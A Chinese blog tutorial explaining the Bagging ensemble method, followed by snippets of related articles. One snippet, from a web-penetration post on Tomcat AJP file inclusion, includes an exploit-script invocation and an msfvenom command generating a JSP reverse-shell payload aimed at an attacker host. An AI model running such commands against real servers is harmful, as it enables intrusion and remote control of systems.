三十六、【人工智能】【机器学习】【监督学习】- Bagging算法模型
系列文章目录
第一章 【机器学习】初识机器学习
第二章 【机器学习】【监督学习】- 逻辑回归算法 (Logistic Regression)
第三章 【机器学习】【监督学习】- 支持向量机 (SVM)
第四章【机器学习】【监督学习】- K-近邻算法 (K-NN)
第五章【机器学习】【监督学习】- 决策树 (Decision Trees)
第六章【机器学习】【监督学习】- 梯度提升机 (Gradient Boosting Machine, GBM)
第七章 【机器学习】【监督学习】-神经网络 (Neural Networks)
第八章【机器学习】【监督学习】-卷积神经网络 (CNN)
第九章【机器学习】【监督学习】-循环神经网络 (RNN)
第十章【机器学习】【监督学习】-线性回归
第十一章【机器学习】【监督学习】-局部加权线性回归 (Locally Weighted Linear Regression, LWLR)
第十二章【机器学习】【监督学习】- 岭回归 (Ridge Regression)
十三、【机器学习】【监督学习】- Lasso回归 (Least Absolute Shrinkage and Selection Operator)
十四、【机器学习】【监督学习】- 弹性网回归 (Elastic Net Regression)
十五、【机器学习】【监督学习】- 神经网络回归
十六、【机器学习】【监督学习】- 支持向量回归 (SVR)
十七、【机器学习】【非监督学习】- K-均值 (K-Means)
十八、【机器学习】【非监督学习】- DBSCAN (Density-Based Spatial Clustering of Applications with Noise)十九、【机器学习】【非监督学习】- 层次聚类 (Hierarchical Clustering)二十、【机器学习】【非监督学习】- 均值漂移 (Mean Shift)
二十一、【机器学习】【非监督学习】- 谱聚类 (Spectral Clustering)
目录
系列文章目录
一、基本定义
(一)、监督学习
(二)、监督学习的基本流程
(三)、监督学习分类算法(Classification)
二、 Bagging
(一)、定义
(二)、基本概念
(三)、训练过程
Bagging的训练过程详解
1. 数据准备:Bootstrap Sampling
2. 模型训练
3. 预测阶段
4. 聚合策略
5. 结果评估与应用
(四)、特点与适用场景
(五)、扩展
三、总结
一、基本定义
(一)、监督学习
监督学习(Supervised Learning)是机器学习中的一种主要方法,其核心思想是通过已知的输入-输出对(即带有标签的数据集)来训练模型,从而使模型能够泛化到未见的新数据上,做出正确的预测或分类。在监督学习过程中,算法“学习”的依据是这些已标记的例子,目标是找到输入特征与预期输出之间的映射关系。
(二)、监督学习的基本流程
数据收集:获取包含输入特征和对应正确输出标签的训练数据集。
数据预处理:清洗数据,处理缺失值,特征选择与转换,标准化或归一化数据等,以便于模型学习。
模型选择:选择合适的算法,如决策树、支持向量机、神经网络等。
训练:使用训练数据集调整模型参数,最小化预测输出与实际标签之间的差距(损失函数)。
验证与调优:使用验证集评估模型性能,调整超参数以优化模型。
测试:最后使用独立的测试集评估模型的泛化能力,确保模型不仅在训练数据上表现良好,也能在未见过的新数据上做出准确预测。
(三)、监督学习分类算法(Classification)
定义:分类任务的目标是学习一个模型,该模型能够将输入数据分配到预定义的几个类别中的一个。这是一个监督学习问题,需要有一组已经标记好类别的训练数据,模型会根据这些数据学习如何区分不同类别。
例子:垃圾邮件检测(垃圾邮件 vs. 非垃圾邮件)、图像识别(猫 vs. 狗)。
二、 Bagging
(一)、定义
Bagging,全称为Bootstrap Aggregating,是一种集成学习方法,旨在通过构建多个不同的模型并将其结果进行汇总,以提高预测的准确性和模型的稳定性。Bagging的核心思想是通过有放回地从原始数据集中抽取多个子样本,然后在每个子样本上独立训练不同的模型,最后将这些模型的结果进行平均或投票,以得到最终的预测结果。
(二)、基本概念
-
Bootstrap Sampling:Bagging中的“Bootstrap”指的是从原始数据集中有放回地抽取相同大小的样本集,这意味着每个样本在子集中可能被多次选中,也可能完全不被选中。
-
多样性:由于每个子样本集都是独立抽取的,因此在每个子样本上训练的模型也会有所不同,这种多样性是Bagging能够提高模型稳定性的关键。
-
Aggregation:训练完成后,Bagging通过聚合所有模型的预测结果来做出最终预测。对于分类问题,通常采用多数投票的方式;对于回归问题,则是取平均值。
(三)、训练过程
Bagging的训练过程可以概括为以下几步:
-
数据准备:从原始数据集中通过Bootstrap Sampling抽取多个子样本集。
-
模型训练:在每个子样本集上独立训练一个基学习器(如决策树)。由于数据集的随机性,每个基学习器都会有所不同。
-
预测阶段:对于一个新的输入实例,所有基学习器都会给出自己的预测,然后根据问题类型(分类或回归)进行投票或平均,得到最终的预测结果。
Bagging的训练过程详解
Bagging(Bootstrap Aggregating)是一种强大的集成学习技术,用于提高预测模型的性能,尤其是减少模型的方差,使其更加稳定和可靠。下面是Bagging训练过程的详细步骤:
1. 数据准备:Bootstrap Sampling
- 数据集划分:首先,从原始训练数据集 ( D ) 中,通过Bootstrap Sampling(自助抽样法)随机抽取 ( N ) 个样本(( N ) 通常是原始数据集的大小),形成一个新的样本集 ( D_i )。这一过程是有放回地进行的,意味着同一个样本可能在新的样本集中出现多次,而有些样本可能一次也不出现。
- •重复抽样:这一过程会重复进行 ( B ) 次,生成 ( B ) 个不同的样本集 ( D_1, D_2, ..., D_B ),每个样本集的大小都大致等于原始数据集的大小。
2. 模型训练
- 独立建模:对于每个样本集 ( D_i ),独立地训练一个基学习器 ( h_i(x) )。基学习器的选择可以是任何机器学习模型,但通常选择的是决策树,因为它们容易过拟合并能从中受益于Bagging带来的稳定性提升。
- 并行训练:这些基学习器可以在不同的样本集上并行训练,因为它们之间没有依赖关系,这使得Bagging非常适合于并行计算环境。
3. 预测阶段
- 单个模型预测:对于一个新输入 ( x ),每个基学习器 ( h_i(x) ) 将给出一个预测结果。
- 结果汇总:根据问题的类型(分类或回归),汇总所有基学习器的预测结果。对于分类问题,通常采用多数投票(Majority Voting)的方式决定最终预测类别;对于回归问题,则是计算所有基学习器预测值的平均值作为最终预测。
4. 聚合策略
- 分类问题:如果基学习器是分类器,那么对于新样本 ( x ),每个分类器 ( h_i(x) ) 都会给出一个类别标签。最终的预测类别是所有分类器预测类别中出现次数最多的那个。
- 回归问题:如果基学习器是回归器,那么每个回归器 ( h_i(x) ) 都会给出一个数值预测。最终的预测值是所有回归器预测值的算术平均。
5. 结果评估与应用
- 模型评估:可以通过交叉验证或保留的测试集来评估Bagging模型的性能。通常,Bagging模型的性能优于单一基学习器的性能,尤其是在减少过拟合和提高预测稳定性方面。
- 模型应用:一旦训练完成,Bagging模型就可以用于对新的未见数据进行预测。
通过上述步骤,Bagging能够有效减少模型的方差,提高预测的稳定性,同时保持甚至增强模型的准确性,特别是在处理高方差模型和复杂数据集时表现尤为突出。
(四)、特点与适用场景
-
减少方差:Bagging通过多样化基学习器来减少模型的方差,提高预测稳定性,尤其适用于高方差的模型,如决策树。
-
提高准确性:由于模型的多样性,Bagging通常能够提高整体的预测准确性,尤其是在处理具有噪声或复杂分布的数据集时。
-
处理不平衡数据:Bagging可以有效地处理类别不平衡的问题,因为在Bootstrap抽样中,少数类别的样本有更多的机会被多次选中,从而在训练集中得到更好的表示。
-
特征选择:可以结合特征重要性分析,帮助识别哪些特征对预测结果影响最大。
(五)、扩展
Bagging的概念可以扩展到多种模型和算法中,以下是一些常见的扩展:
-
Random Forest:在Bagging的基础上,Random Forest进一步引入了特征随机选择的概念,即在每次分裂时只考虑一部分特征,这增加了模型的多样性和泛化能力。
-
AdaBoost:虽然AdaBoost和Bagging都是集成学习方法,但AdaBoost侧重于加权调整,给那些被前一个模型错误分类的样本更高的权重,以使后续模型更加关注这些困难样本。
-
Stacking:Stacking是一种更复杂的集成学习策略,它不仅使用Bagging或其他集成方法生成多个模型,还会使用一个元模型来学习如何最好地组合这些模型的输出。
三、总结
Bagging是一种非常实用的集成学习方法,特别适用于处理高方差模型、减少过拟合风险以及提高模型在复杂数据集上的表现。通过与不同类型的基学习器结合,Bagging可以适应多种机器学习任务和应用场景。
相关文章:

三十六、【人工智能】【机器学习】【监督学习】- Bagging算法模型
系列文章目录 第一章 【机器学习】初识机器学习 第二章 【机器学习】【监督学习】- 逻辑回归算法 (Logistic Regression) 第三章 【机器学习】【监督学习】- 支持向量机 (SVM) 第四章【机器学习】【监督学习】- K-近邻算法 (K-NN) 第五章【机器学习】【监督学习】- 决策树…...

2024年8月8日(python基础)
一、检查并配置python环境(python2内置) 1、检测是否安装 [rootlocalhost ~]# yum list installed| grep python [rootlocalhost ~]# yum -y install epel-release 2、安装python3 [rootlocalhost ~]# yum -y install python3 最新版3.12可以使用源码安…...
SpringAOP_面向切面编程
一、什么是StringAOP AOP(Aspect-Oriented Programming: 面向切面编程):将那些与业务无关, 却为业务模块所共同调用的逻辑(例如事务处理、日志管理、权限控制等)封装抽取成一个可重用的模块,这个模块被命名为“切面”&…...
芯片bring-up的测试用例
文章目录 前言一、测试用例的规划和编写原则1、冒烟测试1)电源时钟复位测试2)寄存器扫描测试3)单一功能冒烟测试 二、遍历测试三、随机测试四、性能测试五、压力测试 总结 前言 最近做了一些用测试用例点亮芯片的工作,从测试用例…...

vs code编辑区域右键菜单突然变短
今天打开vs code发现鼠标在编辑区域按右键,出来的菜单只显示一小段 显示不全,而之前的样子是 显示很多项,怎么设置回到显示很多项呢?...

如何将TRIZ的“最终理想解”应用到机器人电机控制设计中?
TRIZ理论,作为一套系统的创新方法论,旨在帮助设计师和工程师突破思维惯性,解决复杂的技术难题。其核心思想之一便是“最终理想解”,它如同一盏明灯,指引着我们在技术创新的道路上不断前行。最终理想解追求的是产品或技…...

【记录】基于docker部署小熊派BearPi-Pico H3863开发环境
参考:📝 Ubuntu环境下开发环境搭建 | 小熊派BearPi 过程 在物理机中创建一个工作路径 /home/luo/locke/BearPi/BearPi_Pico_H3863创建docker容器 docker run -it \ --privilegedtrue --cap-addALL \ --name BearPi-Pico_H3863_env \ -v /home/luo/lo…...

Elasticsearch 与 OpenSearch:谁才是搜索霸主
Elasticsearch简介 Elasticsearch 是一个开源的、基于 RESTful 接口的分布式搜索和分析引擎,它利用了 Apache Lucene 的强大功能。 它特别适合处理大规模数据,这使得它成为管理和分析日志及事件数据的理想选择。 Elasticsearch 以其即时性而著称&…...

WEB渗透-TomcatAjp之LFIRCE
LFI https://github.com/Kit4y/CNVD-2020-10487-Tomcat-Ajp-lfi-Scanner >python CNVD-2020-10487-Tomcat-Ajp-lfi.py 192.168.0.110 -p 8009 -f pass配合目标文件上传传入服务器 RCE >msfvenom -p java/jsp_shell_reverse_tcp LHOST192.168.0.107 LPORT12138 R >/va…...
嵌入式初学-C语言-二一
数组指针 概念:数组指针是指向数组的指针。 特点: 先有数组,后有指针 它指向的是一个完整的数组。 一维数组指针 数据类型 (*指针变量名)[容量]; 案例: /** * 数组指针:指向数组的指针 */ #include <…...
2376. 统计特殊整数
Powered by:NEFU AB-IN Link 文章目录 2376. 统计特殊整数题意思路代码 2376. 统计特殊整数 题意 如果一个正整数每一个数位都是 互不相同 的,我们称它是 特殊整数 。 给你一个 正 整数 n ,请你返回区间 [1, n] 之间特殊整数的数目。 思路 详见灵神…...

Python 绘图进阶之核密度估计图:掌握数据分布的秘密
Python 绘图进阶之核密度估计图:掌握数据分布的秘密 引言 在数据分析中,了解数据的分布情况是至关重要的一步。除了常用的直方图和箱线图,核密度估计图(Kernel Density Estimation, KDE)提供了一种更为平滑、直观的方…...

设计模式(1)创建型模式和结构型模式
1、目标 本文的主要目标是学习创建型模式和结构型模式,并分别代码实现每种设计模式 2、创建型模式 2.1 单例模式(singleton) 单例模式是创建一个对象保证只有这个类的唯一实例,单例模式分为饿汉式和懒汉式,饿汉式是…...

RuoYi-Vue新建模块
一、环境准备 附:RuoYi-Vue下载与运行 二、新建模块 在RuoYi-Vue下新建模块ruoyi-test。 三、父pom文件添加子模块 在RuoYi-Vue的pom.xml中,引入子模块。 <dependency><groupId>com.ruoyi</groupId><artifactId>ruoyi-test</artifactId>&…...

Element-UI自学实践
概述 Element-UI 是由饿了么前端团队推出的一款基于 Vue.js 2.0 的桌面端 UI 组件库。它为开发者提供了一套完整、易用、美观的组件解决方案,极大地提升了前端开发的效率和质量。本文为自学实践记录,详细内容见 📚 ElementUI官网 1. 基础组…...
ChatGPT如何工作:创作一首诗的过程
疑问 怎样理解 Chat GPT 的工作原理?比如我让他作一首诗,他是如何创作的呢?每一行诗,每一个字都是怎么来的?随机拼凑的还是从哪里借鉴的? 回答 当你让 ChatGPT 创作一首诗时,它并不是简单地随…...

Linux_Shell变量及运算符-05
一、Shell基础 1.1 什么是shell Shell脚本语言是实现Linux/UNIX系统管理及自W动化运维所必备的重要工具, Linux/UNIX系统的底层及基础应用软件的核心大都涉及Shell脚本的内容。Shell是一种编程语言, 它像其它编程语言如: C, Java, Python等一样也有变量/函数/运算…...

OpenCV图像滤波(13)均值迁移滤波函数pyrMeanShiftFiltering()的使用
操作系统:ubuntu22.04 OpenCV版本:OpenCV4.9 IDE:Visual Studio Code 编程语言:C11 算法描述 函数执行均值迁移图像分割的初始步骤。 该函数实现了均值迁移分割的过滤阶段,即输出是经过滤波的“海报化”图像,其中颜色…...
用爬虫技术探索石墨文档:数据自动化处理与个性化应用的创新实践
用爬虫技术探索石墨文档:数据自动化处理与个性化应用的创新实践 在当今这个信息爆炸的时代,文档管理与协作成为了企业运营和个人工作中不可或缺的一部分。石墨文档,作为一款轻量级的云端Office套件,凭借其强大的在线协作、实时同…...

【JavaEE初阶】线程池
目录 📕 引言 🌳 概念 🍀ThreadPoolExecutor 类 🚩 int corePoolSize与int maximumPoolSize: 🚩 long keepAliveTime与TimeUnit nuit: 🚩 BlockingQueue workQueue:…...

深入剖析AI大模型:大模型时代的 Prompt 工程全解析
今天聊的内容,我认为是AI开发里面非常重要的内容。它在AI开发里无处不在,当你对 AI 助手说 "用李白的风格写一首关于人工智能的诗",或者让翻译模型 "将这段合同翻译成商务日语" 时,输入的这句话就是 Prompt。…...

智慧医疗能源事业线深度画像分析(上)
引言 医疗行业作为现代社会的关键基础设施,其能源消耗与环境影响正日益受到关注。随着全球"双碳"目标的推进和可持续发展理念的深入,智慧医疗能源事业线应运而生,致力于通过创新技术与管理方案,重构医疗领域的能源使用模式。这一事业线融合了能源管理、可持续发…...
进程地址空间(比特课总结)
一、进程地址空间 1. 环境变量 1 )⽤户级环境变量与系统级环境变量 全局属性:环境变量具有全局属性,会被⼦进程继承。例如当bash启动⼦进程时,环 境变量会⾃动传递给⼦进程。 本地变量限制:本地变量只在当前进程(ba…...

无法与IP建立连接,未能下载VSCode服务器
如题,在远程连接服务器的时候突然遇到了这个提示。 查阅了一圈,发现是VSCode版本自动更新惹的祸!!! 在VSCode的帮助->关于这里发现前几天VSCode自动更新了,我的版本号变成了1.100.3 才导致了远程连接出…...
大语言模型如何处理长文本?常用文本分割技术详解
为什么需要文本分割? 引言:为什么需要文本分割?一、基础文本分割方法1. 按段落分割(Paragraph Splitting)2. 按句子分割(Sentence Splitting)二、高级文本分割策略3. 重叠分割(Sliding Window)4. 递归分割(Recursive Splitting)三、生产级工具推荐5. 使用LangChain的…...

剑指offer20_链表中环的入口节点
链表中环的入口节点 给定一个链表,若其中包含环,则输出环的入口节点。 若其中不包含环,则输出null。 数据范围 节点 val 值取值范围 [ 1 , 1000 ] [1,1000] [1,1000]。 节点 val 值各不相同。 链表长度 [ 0 , 500 ] [0,500] [0,500]。 …...
Neo4j 集群管理:原理、技术与最佳实践深度解析
Neo4j 的集群技术是其企业级高可用性、可扩展性和容错能力的核心。通过深入分析官方文档,本文将系统阐述其集群管理的核心原理、关键技术、实用技巧和行业最佳实践。 Neo4j 的 Causal Clustering 架构提供了一个强大而灵活的基石,用于构建高可用、可扩展且一致的图数据库服务…...
Linux云原生安全:零信任架构与机密计算
Linux云原生安全:零信任架构与机密计算 构建坚不可摧的云原生防御体系 引言:云原生安全的范式革命 随着云原生技术的普及,安全边界正在从传统的网络边界向工作负载内部转移。Gartner预测,到2025年,零信任架构将成为超…...

2025年渗透测试面试题总结-腾讯[实习]科恩实验室-安全工程师(题目+回答)
安全领域各种资源,学习文档,以及工具分享、前沿信息分享、POC、EXP分享。不定期分享各种好玩的项目及好用的工具,欢迎关注。 目录 腾讯[实习]科恩实验室-安全工程师 一、网络与协议 1. TCP三次握手 2. SYN扫描原理 3. HTTPS证书机制 二…...
NPOI Excel用OLE对象的形式插入文件附件以及插入图片
static void Main(string[] args) {XlsWithObjData();Console.WriteLine("输出完成"); }static void XlsWithObjData() {// 创建工作簿和单元格,只有HSSFWorkbook,XSSFWorkbook不可以HSSFWorkbook workbook new HSSFWorkbook();HSSFSheet sheet (HSSFSheet)workboo…...